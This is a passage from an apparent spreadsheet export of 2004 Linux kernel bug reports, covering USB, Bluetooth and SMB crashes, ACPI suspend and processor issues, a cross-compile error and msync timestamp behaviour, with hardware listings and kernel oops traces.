Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Interrupt: pin A routed to IRQ 20 Region 4: I/O ports at e400 [size=16] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 50) Subsystem: Giga-byte Technology GA-7VAX Onboard Audio (Realtek ALC650) Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin C routed to IRQ 22 Region 0: I/O ports at e800 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:01:00.0 VGA compatible controller: ATI Technologies Inc Radeon RV100 QY [Radeon 7000/VE] (prog-if 00 [VGA]) Subsystem: Palit Microsystems Inc.: Unknown device 5159 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (2000ns min), Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 16 Region 0: Memory at d8000000 (32-bit, prefetchable) Region 1: I/O ports at c000 [size=256] Region 2: Memory at e1000000 (32-bit, non-prefetchable) [size=64K] Capabilities: [58] AGP version 2.0 Status: RQ=48 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=32 ArqSz=0 Cal=0 SBA+ AGP+ GART64- 64bit- FW- Rate=x1 Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Software Environment: maschine2:/home/jo# sh /usr/src/kernel-kbuild-2.6-1/scripts/ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux maschine2 2.6.5-1-k7 #1 Sat Apr 24 12:03:50 EST 2004 i686 GNU/Linux Gnu C 3.3.3 Gnu make 3.80 binutils 2.14.90.0.7 util-linux 2.12 mount 2.12 module-init-tools 3.0-pre10 e2fsprogs 1.35 PPP 2.4.2 nfs-utils 1.0.6 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.2.1 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.0.91 Modules Loaded snd_mixer_oss radeon vmnet vmmon rfcomm l2cap parport_pc lp ipt_state ipt_MASQUERADE iptable_filter ip_nat_ftp iptable_nat ip_conntrack_irc ip_conntrack_ftp ip_conntrack ip_tables ipv6 hci_usb bluetooth sd_mod snd_via82xx snd_ac97_codec gameport snd_mpu401_uart snd_rawmidi snd_seq_device via82cxxx_audio uart401 sound ac97_codec usblp via_ircc irda ehci_hcd uhci_hcd snd_bt87x snd_pcm snd_timer snd snd_page_alloc btaudio bt878 tuner tvaudio bttv video_buf i2c_algo_bit v4l2_common btcx_risc i2c_core videodev soundcore ne2k_pci 8390 8139too 8139cp mii crc32 pci_hotplug via_agp agpgart vfat fat dm_mod tsdev mousedev evdev xtkbd sr_mod cdrom psmouse ide_scsi udf usb_storage usbcore scsi_mod ntfs nls_iso8859_1 nls_cp852 nls_cp437 nls_iso8859_15 parport af_packet rtc ext3 jbd mbcache ide_disk ide_generic via82cxxx ide_core unix font cfbcopyarea cfbimgblt cfbfillrect Problem Description: When unplugging my pen-drive (Energy System 128MB+Bluetooth) it hangs completely, it does not even write the output to /var/log/kernel When I plug it in it's OK: Apr 28 16:13:30 maschine2 kernel: usb 2-1: new full speed USB device using address 2 Apr 28 16:13:30 maschine2 kernel: hub 2-1:1.0: USB hub found Apr 28 16:13:30 maschine2 kernel: hub 2-1:1.0: 4 ports detected Apr 28 16:13:30 maschine2 kernel: usb 2-1.1: new full speed USB device using address 3 Apr 28 16:13:30 maschine2 kernel: scsi2 : SCSI emulation for USB Mass Storage devices Apr 28 16:13:31 maschine2 kernel: Vendor: UFD Model: Rev: 7.77 Apr 28 16:13:31 maschine2 kernel: Type: Direct-Access ANSI SCSI revision: 02 Apr 28 16:13:31 maschine2 kernel: USB Mass Storage device found at 3 Apr 28 16:13:31 maschine2 kernel: SCSI device sda: 256000 512-byte hdwr sectors (131 MB) Apr 28 16:13:31 maschine2 kernel: sda: assuming Write Enabled Apr 28 16:13:31 maschine2 kernel: sda: assuming drive cache: write through Apr 28 16:13:31 maschine2 kernel: /dev/scsi/host2/bus0/target0/lun0: p1 Apr 28 16:13:31 maschine2 kernel: Attached scsi removable disk sda at scsi2, channel 0, id 0, lun 0 Apr 28 16:13:31 maschine2 kernel: usb 2-1.4: new full speed USB device using address 4 I can mount it and work, everything fine. But when I unplug it, this is what it shows in the first terminal (if I'm using X-window I see nothing and the machine does not respond), I've copied it down. PREEMPT CPU:0 EIP: 0060:[&lt;E08EC460&gt;] Tainted: P EFLAGS: 00010002 (2.6.5-1-k7) EIP is at urb_unlink+0x30/0x90 [usbcore] eax: d4f1625 ebx: 00000000 ecx: 00000000 edx: c6826000 esi: 0000246 edi: d4f16254 ebp: df02b9f4 esp: c6827efc ds: 007b es:007b ss: 0068 Process hotplug (pid:23355, threadinfo= c6826000 task= c33e0240) Stack: d4f16254 df02b800 c6827fc4 d4f16254 c6827fc4 df02b800 e08ecbeb d4f16254 d4f16254 c6826000 d4f16254 e0a49da0 df02b800 d4f16254 c6827fc4 c6827fc4 df02b9d4 df02b9d4 df02b800 c6827fc5 e0a49f86 df02b800 c6827fc4 00000000 Call Trace: [&lt;e08ecbeb&gt;] usb_hcd_giveback_urb+0x1b/0x40 [usbcore] [&lt;e0a49da0&gt;] uhci_finish_completion+0x60/0xa0 [uhci_hcd] [&lt;e0a49f86&gt;] uhci_irq+0x106/ox170 [uhci_hcd] [&lt;e08ecc46&gt;] usb_hcd_irq+0x36/0x70 [usbcore] [&lt;c010b5aa&gt;] handle_IRQ_event+0x3a/0x70 [&lt;c010b941&gt;] do_IRQ+0x91/0x130 [&lt;c0109ce4&gt;] common_interrupt+0x18/0x20 Code: 89 59 04 89 0b 89 40 04 89 47 08 8b 5f 14 56 9d 8b 42 08 ff &lt;0&gt; Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing. Steps to reproduce: Plug and unplug. Any hint?</t>
  </si>
  <si>
    <t>kernel panic removing bluetooth device</t>
  </si>
  <si>
    <t>2.6.4rc2</t>
  </si>
  <si>
    <t>2004-04-28 13:24 UTC</t>
  </si>
  <si>
    <t>Giuseppe De Michele</t>
  </si>
  <si>
    <t>2005-07-10 04:22 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake 9.2 Hardware Environment: Hamlet Exagerate USB to Bluetooth Software Environment: Bluez Problem Description: If I remove my bluetooth usb device without doing "hciconfig hci0 down", kernel panics. Steps to reproduce: Try to remove a used usb to bluetooth device</t>
  </si>
  <si>
    <t>Adding SMP support for ACPI processor driver</t>
  </si>
  <si>
    <t>2004-04-28 22:25 UTC</t>
  </si>
  <si>
    <t>2004-11-04 13:08 UTC</t>
  </si>
  <si>
    <t>acpi_power-processor</t>
  </si>
  <si>
    <t>Distribution: Base 2.6 kernel Hardware Environment: Software Environment: Problem Description: There are 2 issues here: 1) MADT has 8 bit ACPIID, which refers to the CPU namespace in ACPI. This id should be used by ACPI processor driver to look up corresponding CPU namespace. As of now the ACPIID is being ignored by the kernel. And the processor driver assumes that ACPIID is in the same order as smp_processor_id (). The processor driver is used by i386, x86-64 and ia64 archs. The first patch below proposes a fix for this problem. 2) The ACPI P-state driver, does not work on SMP systems. As per the current cpufreq architecture, A process running on CPU X can get/set frequency of CPU Y. It is the responsibility of low level P-state driver (ACPI P-state driver in this case) to do whatever necessary (switch to proper CPU) and get/set the frequency. The second patch below adds this capability to ACPI P-state driver. The mechanism is very much similar to the ones in other frequency drivers like p4-clockmod. Steps to reproduce:</t>
  </si>
  <si>
    <t>alcatel td10 usb to serial adapter support id include for pl-2303</t>
  </si>
  <si>
    <t>2004-04-30 05:30 UTC</t>
  </si>
  <si>
    <t>Oleg Kokorin</t>
  </si>
  <si>
    <t>2004-10-06 13:41 UTC</t>
  </si>
  <si>
    <t>Distribution: gentoo Hardware Environment: P4 2.4, ALCATEL 535, TD10 USB-Serial(Alcatel 535-735) Software Environment: gentoo-dev-sources, 2.6.5-r1 Problem Description: support for ALCATEL phone over USB-Serial TD10 adapter, ID:0x11f7:0x02df is not supported by USB-Serial kernel driver (module) Steps to reproduce: plugin TD10 into USB port, no message about usb/tts/x assignment and no modules loaded</t>
  </si>
  <si>
    <t>2.6.6-rc3</t>
  </si>
  <si>
    <t>Add missing protype for achware.h</t>
  </si>
  <si>
    <t>ACPI-CA 20040427</t>
  </si>
  <si>
    <t>Error in kernel cross compile for MPC8xx(ppc)</t>
  </si>
  <si>
    <t>2004-05-03 01:09 UTC</t>
  </si>
  <si>
    <t>Ananth Narayan S</t>
  </si>
  <si>
    <t>2004-05-24 14:32 UTC</t>
  </si>
  <si>
    <t>Arthur Othieno</t>
  </si>
  <si>
    <t>Distribution: Suse 9.0 Hardware Environment: x86 Software Environment: gcc 3.3.1 , binutils 2.15 to cross compile for ppc Problem Description: We are getting the following error while cross-compiling 2.6.5/2.6.0 for ppc based MPC8xx board. CC arch/ppc/syslib/m8xx_setup.c arch/ppc/syslib/m8xx_setup.c:224:35: macro "mfmsr" passed 1 arguments, but takes just 0 arch/ppc/syslib/m8xx_setup.c: In function `m8xx_restart': arch/ppc/syslib/m8xx_setup.c:224: error: `mfmsr' undeclared (first use in this function) arch/ppc/syslib/m8xx_setup.c:224: error: (Each undeclared identifier is reported only once arch/ppc/syslib/m8xx_setup.c:224: error: for each function it appears in.) arch/ppc/syslib/m8xx_setup.c:217: warning: unused variable `msr' make[1]: *** [arch/ppc/syslib/m8xx_setup.o] Error 1 make: *** [arch/ppc/syslib] Error 2 However, when we select some other processor type like 6xx/7xx/74xx/8260 it compiles cleanly. So to say the crosscompiler packages are working properly and the problem is specific to MPC8xx. We are using gcc 3.3.1 and binutils 2.15 for cross-compiling. All these reside on x86 system running Suse 9.0. Any Clue/Suggestions ??? Is there any patch that needs to be applied to get away with this ? Steps to reproduce: select processor type ppc MPC 8xx and cross compile(make) for ppc.</t>
  </si>
  <si>
    <t>HDD I/O drops to 229kb/sec if highmem is enabled</t>
  </si>
  <si>
    <t>2004-05-04 08:37 UTC</t>
  </si>
  <si>
    <t>Ludwig Ruderstaller</t>
  </si>
  <si>
    <t>2008-09-22 08:56 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: P4 Prescott HT, 4x512MB RAM, 7000series Escalade (Mirroring), 2X 120GB HDD (WDC WD1200JB-00FUA0) Software Environment: Problem Description: As soon as Highmem is enabled, the I/O drops down to ~229kb/sec in putc/getc mode. (block writing is faster, but also not on normal) The hddsmart shows no errors on the HDD's. escalade bios tool to verfiy data shows also no problems. memtest86 shows no errors in the rammodules, also a switch (bank 0 to bank 1) of the modules makes no different. (thought maybe the ram on the second bank is damaged and so without highmem it isnt used) let me know if you need further information. ssh access is possible if needed (not yet in production enviroment).</t>
  </si>
  <si>
    <t>kernel parameter acpi_os_name= does not work</t>
  </si>
  <si>
    <t>2004-05-04 13:25 UTC</t>
  </si>
  <si>
    <t>2004-11-03 17:52 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Centrino Notebook Bullman V5Cen (= Compal CL50) Problem Description: I am using the command line parameter acpi_os_name="Microsoft Windows XP" to prevent the EHCI device from being disabled. However, this does not work anymore with kernel 2.6.5 onwards. With kernel 2.6.4, dmesg also showed a line containing: ACPI: Overriding _OS definition With kernel 2.6.5 and 2.6.6-rc1, acpi_os_name="Microsoft Windows XP" does not have the desired effect (not disabling the EHCI device), and the above line is not shown in dmesg. This happens with both the kernels supplied by the Debian project and kernels compiled by myself from the original source.</t>
  </si>
  <si>
    <t>Oops when mounting a smb filesystem</t>
  </si>
  <si>
    <t>Linux knudde.be.ubizen.com 2.6.5 #20 Fri Apr 30 17:19:26 CEST 20</t>
  </si>
  <si>
    <t>2004-05-05 06:11 UTC</t>
  </si>
  <si>
    <t>Jos Dehaes</t>
  </si>
  <si>
    <t>2004-06-20 16:32 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: x86, dell optiplex gx1, ati mach64 Software Environment: Linux 2.6.5 vanilla preempt + supermount patch, glibc 2.3.2 NPTL, gcc 2.3.3, samba 3.0.2a Gnu C 3.3.3 Gnu make 3.80 binutils 2.14.90.0.8 util-linux 2.12 mount 2.12 module-init-tools 3.0 e2fsprogs 1.35 nfs-utils 1.0.6 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.2.1 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.0 Modules Loaded vmnet vmmon binfmt_misc sd_mod usb_storage scsi_mod uhci_hcd usbcore Problem Description: Sometimes smb mount gives oops in syslog, but not always. The offending process is always nautilus (version 2.6.1). After that that accessing the mount point gives processes in uninterruptable sleep. oops: smb_lookup: find //.Trash-jos failed, error=-5 Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: 00000000 *pde = 00000000 Oops: 0000 [#1] PREEMPT CPU: 0 EIP: 0060:[&lt;00000000&gt;] Not tainted EFLAGS: 00010246 (2.6.5) EIP is at 0x0 eax: d9f94c20 ebx: d68a3f30 ecx: c015e7c0 edx: d81c4ae0 esi: d68a3fa0 edi: c1329600 ebp: d44d85e0 esp: d68a3efc ds: 007b es: 007b ss: 0068 Process nautilus (pid: 6808, threadinfo=d68a2000 task=d6d1cd60) Stack: c01c16d6 d44d85e0 d68a3fa0 c015e7c0 d68a3f30 00000000 00000002 00000004 d43c4ec4 00000000 d43c0000 d81c4ae0 d4ac8b60 00000000 fffe7b2a d44d85e0 00000000 00000000 d43c0000 00000002 00000000 00000000 00000001 00000004 Call Trace: [&lt;c01c16d6&gt;] smb_readdir+0x3f6/0x5a0 [&lt;c015e7c0&gt;] filldir64+0x0/0x120 [&lt;c015e489&gt;] vfs_readdir+0x89/0xa0 [&lt;c015e7c0&gt;] filldir64+0x0/0x120 [&lt;c015e94e&gt;] sys_getdents64+0x6e/0xaa [&lt;c015e7c0&gt;] filldir64+0x0/0x120 [&lt;c0107009&gt;] sysenter_past_esp+0x52/0x71 Code: Bad EIP value. Steps to reproduce: mount an smb filesystem. Doesn't happen allways, but has bitten me at least 5 times the last weeks. To reproduce for this bugreport, it happened on the first try.</t>
  </si>
  <si>
    <t>No ACPI Events after Suspend</t>
  </si>
  <si>
    <t>2.6.6-rc3-mm1</t>
  </si>
  <si>
    <t>2004-05-05 07:51 UTC</t>
  </si>
  <si>
    <t>2004-10-17 20:18 UTC</t>
  </si>
  <si>
    <t>2438 2596 2965</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Sharp PC-MM10 (see bug 2438) Software Environment: debian unstable udev 0.024-7 gcc 3.3.3-2 module-init-tools 3.0-pre10-2 modutils 2.4.26-1 Problem Description: after a suspend/resume cycle the kernel doesen't receive any acpi event (LID, BAT, FF) and the Fn-XX hardware control buttons are disabled (Backlight brightness, speaker volume, screen switch, antenna on/off, etc) Steps to reproduce: suspend to ram (S3) resume try hardware button</t>
  </si>
  <si>
    <t>ACPI-CA 20040402 GPE handling causes immediate wake on Thinkpads</t>
  </si>
  <si>
    <t>2004-05-05 13:25 UTC</t>
  </si>
  <si>
    <t>The change to GPE handling made in 20040402 (and remaining in 20040427) causes Thinkpads to immediately resume when suspended (i.e., S3). Before this version, suspend/resume worked normally. Some datapoints have been gathered: * Suspend/resume works fine as long as only the power button is used to wake the system. The power button is fixed. * After pressing the lid or sleep buttons (both control method), the next suspend immediately resumes. I'll keep gathering more data. First test is to log all the IO writes to GPEs for the working kernel (20030326) and the non-working versions and diff them.</t>
  </si>
  <si>
    <t>msync() does not update the st_mtime and st_ctime fields</t>
  </si>
  <si>
    <t>2.4.X, 2.6.X</t>
  </si>
  <si>
    <t>2004-05-06 01:44 UTC</t>
  </si>
  <si>
    <t>2009-10-12 22:39 UTC</t>
  </si>
  <si>
    <t>Anton Salikhmetov</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux 3.0r2 Hardware Environment: x86 Software Environment: Any software updating files solely via. mmap(). In this particular scenario, I see the problem with the SysOrb Network Monitoring System (http://www.sysorb.com) - it holds three database files; main.odb, main.odbj and main.tsdb. main.odb and main.tsdb are updated with read/write, while main.odbj is updated solely by means of an mmap(). Problem Description: The file(s) updated solely by means of an mmap() (open/mmap/{modify mem}/close) do not get their mtime updated. This is a serious problem when running backups, as the backup software will see such files as "not modified". I believe that this is a bug; mtime should reflect when file data changes. Solaris 9 does update the mtime correctly in the scenario that I tested. Windows 2000 exhibits the same problem as Linux when using the M$ equivalent of mmap. If that's any consolation ;) Steps to reproduce: See the atime/mtime/ctime using 'stat' of a file. Update the file with a open/mmap/{modify mem}/close Use 'stat' again to see that the mtime does not reflect the fact that the file data was changed.</t>
  </si>
  <si>
    <t>sleeping function called from invalid context at drivers/block/ll_rw_blk.c:1148</t>
  </si>
  <si>
    <t>2.6.6-rc3-mm2 and probably some others before</t>
  </si>
  <si>
    <t>2004-05-09 02:04 UTC</t>
  </si>
  <si>
    <t>2004-06-09 14:20 UTC</t>
  </si>
  <si>
    <t>Distribution: up-to-date fedora devel Hardware Environment: http://www.giga-byte.com/products/7vax.htm (Via KT 400 + Via VT 8235 + Realtek RTL8100BL) Software environment: raid1 ext3 / on SII680 Problem Description: When booting in 2.6.6-rc3-mm2 the logs are flooded with error messages : May 8 12:18:49 rousalka kernel: Debug: sleeping function called from invalid context at drivers/block/ll_rw_blk.c:1148 May 8 12:18:49 rousalka kernel: in_atomic():1, irqs_disabled():1 May 8 12:18:49 rousalka kernel: [&lt;c0114215&gt;] __might_sleep+0xa5/0xaf May 8 12:18:49 rousalka kernel: [&lt;c020b32f&gt;] generic_unplug_device+0x12/0x5f May 8 12:18:49 rousalka kernel: [&lt;c026c453&gt;] unplug_slaves+0x41/0x68 May 8 12:18:49 rousalka kernel: [&lt;c020b38b&gt;] blk_backing_dev_unplug+0xf/0x10 May 8 12:18:49 rousalka kernel: [&lt;c01440eb&gt;] sync_buffer+0x24/0x25 May 8 12:18:49 rousalka kernel: [&lt;c01441f5&gt;] __wait_on_buffer+0x6d/0x8b May 8 12:18:49 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:49 rousalka kernel: [&lt;c020c65d&gt;] submit_bio+0xa5/0xad May 8 12:18:49 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:49 rousalka kernel: [&lt;c0178863&gt;] ext3_get_inode_loc+0x1b0/0x1f3 May 8 12:18:49 rousalka kernel: [&lt;c0178928&gt;] ext3_read_inode+0x2c/0x2bc May 8 12:18:49 rousalka kernel: [&lt;c017a589&gt;] ext3_lookup+0x57/0x89 May 8 12:18:49 rousalka kernel: [&lt;c014daa7&gt;] real_lookup+0x66/0xc8 May 8 12:18:49 rousalka kernel: [&lt;c014dca4&gt;] do_lookup+0x43/0x72 May 8 12:18:49 rousalka kernel: [&lt;c014dfe5&gt;] link_path_walk+0x312/0x7f1 May 8 12:18:49 rousalka kernel: [&lt;c014e767&gt;] path_lookup+0x11b/0x14b May 8 12:18:49 rousalka kernel: [&lt;c014ed8f&gt;] open_namei+0x85/0x3dd May 8 12:18:49 rousalka kernel: [&lt;c01bb1a4&gt;] copy_to_user+0x3a/0x42 May 8 12:18:49 rousalka kernel: [&lt;c01426bd&gt;] filp_open+0x23/0x3c May 8 12:18:49 rousalka kernel: [&lt;c0142aa7&gt;] sys_open+0x31/0x7d May 8 12:18:49 rousalka kernel: [&lt;c01039ed&gt;] sysenter_past_esp+0x52/0x71 May 8 12:18:49 rousalka kernel: Debug: sleeping function called from invalid context at drivers/block/ll_rw_blk.c:1148 May 8 12:18:49 rousalka kernel: in_atomic():1, irqs_disabled():1 May 8 12:18:49 rousalka kernel: [&lt;c0114215&gt;] __might_sleep+0xa5/0xaf May 8 12:18:49 rousalka kernel: [&lt;c020b32f&gt;] generic_unplug_device+0x12/0x5f May 8 12:18:49 rousalka kernel: [&lt;c026c453&gt;] unplug_slaves+0x41/0x68 May 8 12:18:49 rousalka kernel: [&lt;c020b38b&gt;] blk_backing_dev_unplug+0xf/0x10 May 8 12:18:49 rousalka kernel: [&lt;c01440eb&gt;] sync_buffer+0x24/0x25 May 8 12:18:49 rousalka kernel: [&lt;c01441f5&gt;] __wait_on_buffer+0x6d/0x8b May 8 12:18:49 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:49 rousalka kernel: [&lt;c020c65d&gt;] submit_bio+0xa5/0xad May 8 12:18:49 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:49 rousalka kernel: [&lt;c0145277&gt;] __bread_slow+0x4c/0x61 May 8 12:18:49 rousalka kernel: [&lt;c014545e&gt;] __bread+0x14/0x19 May 8 12:18:49 rousalka kernel: [&lt;c017659a&gt;] ext3_get_branch+0x5d/0xcf May 8 12:18:49 rousalka kernel: [&lt;c0176b20&gt;] ext3_get_block_handle+0x9a/0x26b May 8 12:18:49 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:49 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:49 rousalka kernel: [&lt;c020c65d&gt;] submit_bio+0xa5/0xad May 8 12:18:49 rousalka kernel: [&lt;c0176d52&gt;] ext3_get_block+0x61/0x69 May 8 12:18:49 rousalka kernel: [&lt;c015dc9d&gt;] do_mpage_readpage+0xe6/0x2b6 May 8 12:18:49 rousalka kernel: [&lt;c01b8a88&gt;] radix_tree_node_alloc+0x10/0x41 May 8 12:18:49 rousalka kernel: [&lt;c015df18&gt;] mpage_readpages+0xab/0x13d May 8 12:18:49 rousalka kernel: [&lt;c0176cf1&gt;] ext3_get_block+0x0/0x69 May 8 12:18:49 rousalka kernel: [&lt;c017a5a2&gt;] ext3_lookup+0x70/0x89 May 8 12:18:49 rousalka kernel: [&lt;c01777fc&gt;] ext3_readpages+0x12/0x14 May 8 12:18:49 rousalka kernel: [&lt;c0176cf1&gt;] ext3_get_block+0x0/0x69 May 8 12:18:49 rousalka kernel: [&lt;c0130c89&gt;] read_pages+0x32/0x124 May 8 12:18:49 rousalka kernel: [&lt;c012ea0d&gt;] buffered_rmqueue+0x171/0x17b May 8 12:18:49 rousalka kernel: [&lt;c012ecc1&gt;] __alloc_pages+0x2aa/0x2b4 May 8 12:18:49 rousalka kernel: [&lt;c0130eea&gt;] force_page_cache_readahead+0x16f/0x1ad May 8 12:18:49 rousalka kernel: [&lt;c012c17f&gt;] do_readahead+0x36/0x3d May 8 12:18:49 rousalka kernel: [&lt;c012c201&gt;] sys_readahead+0x7b/0x8e May 8 12:18:49 rousalka kernel: [&lt;c01039ed&gt;] sysenter_past_esp+0x52/0x71 May 8 12:18:49 rousalka kernel: Debug: sleeping function called from invalid context at drivers/block/ll_rw_blk.c:1148 May 8 12:18:49 rousalka kernel: in_atomic():1, irqs_disabled():1 May 8 12:18:49 rousalka kernel: [&lt;c0114215&gt;] __might_sleep+0xa5/0xaf May 8 12:18:49 rousalka kernel: [&lt;c020b32f&gt;] generic_unplug_device+0x12/0x5f May 8 12:18:49 rousalka kernel: [&lt;c026c453&gt;] unplug_slaves+0x41/0x68 May 8 12:18:49 rousalka kernel: [&lt;c020b38b&gt;] blk_backing_dev_unplug+0xf/0x10 May 8 12:18:49 rousalka kernel: [&lt;c01440eb&gt;] sync_buffer+0x24/0x25 May 8 12:18:49 rousalka kernel: [&lt;c01441f5&gt;] __wait_on_buffer+0x6d/0x8b May 8 12:18:49 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:49 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:49 rousalka kernel: [&lt;c018448c&gt;] journal_commit_transaction+0x9b6/0xe1e May 8 12:18:49 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:49 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:49 rousalka kernel: [&lt;c02f9c16&gt;] schedule+0x3ae/0x3ef May 8 12:18:49 rousalka kernel: [&lt;c018632f&gt;] kjournald+0xb9/0x20d May 8 12:18:49 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:49 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:49 rousalka kernel: [&lt;c0103916&gt;] ret_from_fork+0x6/0x14 May 8 12:18:49 rousalka kernel: [&lt;c0186270&gt;] commit_timeout+0x0/0x5 May 8 12:18:49 rousalka kernel: [&lt;c0186276&gt;] kjournald+0x0/0x20d May 8 12:18:49 rousalka kernel: [&lt;c01021d9&gt;] kernel_thread_helper+0x5/0xb May 8 12:18:50 rousalka kernel: Debug: sleeping function called from invalid context at drivers/block/ll_rw_blk.c:1148 May 8 12:18:50 rousalka kernel: in_atomic():1, irqs_disabled():1 May 8 12:18:53 rousalka kernel: [&lt;c0114215&gt;] __might_sleep+0xa5/0xaf May 8 12:18:53 rousalka kernel: [&lt;c020b32f&gt;] generic_unplug_device+0x12/0x5f May 8 12:18:53 rousalka kernel: [&lt;c026c453&gt;] unplug_slaves+0x41/0x68 May 8 12:18:53 rousalka kernel: [&lt;c020b38b&gt;] blk_backing_dev_unplug+0xf/0x10 May 8 12:18:53 rousalka kernel: [&lt;c01440eb&gt;] sync_buffer+0x24/0x25 May 8 12:18:53 rousalka kernel: [&lt;c01441f5&gt;] __wait_on_buffer+0x6d/0x8b May 8 12:18:53 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:53 rousalka kernel: [&lt;c020c65d&gt;] submit_bio+0xa5/0xad May 8 12:18:53 rousalka kernel: [&lt;c01144dc&gt;] autoremove_wake_function+0x0/0x28 May 8 12:18:53 rousalka kernel: [&lt;c0145277&gt;] __bread_slow+0x4c/0x61 May 8 12:18:53 rousalka kernel: [&lt;c014545e&gt;] __bread+0x14/0x19 May 8 12:18:53 rousalka kernel: [&lt;c01734fe&gt;] read_block_bitmap+0x27/0x4a May 8 12:18:53 rousalka kernel: [&lt;c017442a&gt;] ext3_new_block+0x26d/0x4e3 May 8 12:18:53 rousalka kernel: [&lt;c017640d&gt;] ext3_alloc_block+0x9/0xb May 8 12:18:53 rousalka kernel: [&lt;c0176738&gt;] ext3_alloc_branch+0x4a/0x22a May 8 12:18:53 rousalka kernel: [&lt;c0176c2f&gt;] ext3_get_block_handle+0x1a9/0x26b May 8 12:18:53 rousalka kernel: [&lt;c01453f7&gt;] __find_get_block+0xb2/0xba May 8 12:18:53 rousalka kernel: [&lt;c01453f7&gt;] __find_get_block+0xb2/0xba May 8 12:18:53 rousalka kernel: [&lt;c014540d&gt;] __getblk+0xe/0x21 May 8 12:18:53 rousalka kernel: [&lt;c0178700&gt;] ext3_get_inode_loc+0x4d/0x1f3 May 8 12:18:53 rousalka kernel: [&lt;c0176d52&gt;] ext3_get_block+0x61/0x69 May 8 12:18:53 rousalka kernel: [&lt;c0145a0c&gt;] __block_prepare_write+0x11d/0x375 May 8 12:18:53 rousalka kernel: [&lt;c01462ca&gt;] block_prepare_write+0x16/0x22 May 8 12:18:53 rousalka kernel: [&lt;c0176cf1&gt;] ext3_get_block+0x0/0x69 May 8 12:18:53 rousalka kernel: [&lt;c017710a&gt;] ext3_prepare_write+0x52/0xf6 May 8 12:18:53 rousalka kernel: [&lt;c0176cf1&gt;] ext3_get_block+0x0/0x69 May 8 12:18:53 rousalka kernel: [&lt;c012d0d3&gt;] generic_file_aio_write_nolock+0x5a3/0x8ff May 8 12:18:53 rousalka kernel: [&lt;c017c866&gt;] __ext3_journal_stop+0x19/0x34 May 8 12:18:53 rousalka kernel: [&lt;c012ea0d&gt;] buffered_rmqueue+0x171/0x17b May 8 12:18:53 rousalka kernel: [&lt;c012ecc1&gt;] __alloc_pages+0x2aa/0x2b4 May 8 12:18:53 rousalka kernel: [&lt;c012d503&gt;] generic_file_aio_write+0x69/0x7c May 8 12:18:53 rousalka kernel: [&lt;c0175149&gt;] ext3_file_write+0x19/0x88 May 8 12:18:53 rousalka kernel: [&lt;c0143274&gt;] do_sync_write+0x68/0x9d May 8 12:18:53 rousalka kernel: [&lt;c0142cec&gt;] generic_file_llseek+0x0/0xc2 May 8 12:18:53 rousalka kernel: [&lt;c0143361&gt;] vfs_write+0xb8/0xe4 May 8 12:18:53 rousalka kernel: [&lt;c01433fb&gt;] sys_write+0x2c/0x42 May 8 12:18:53 rousalka kernel: 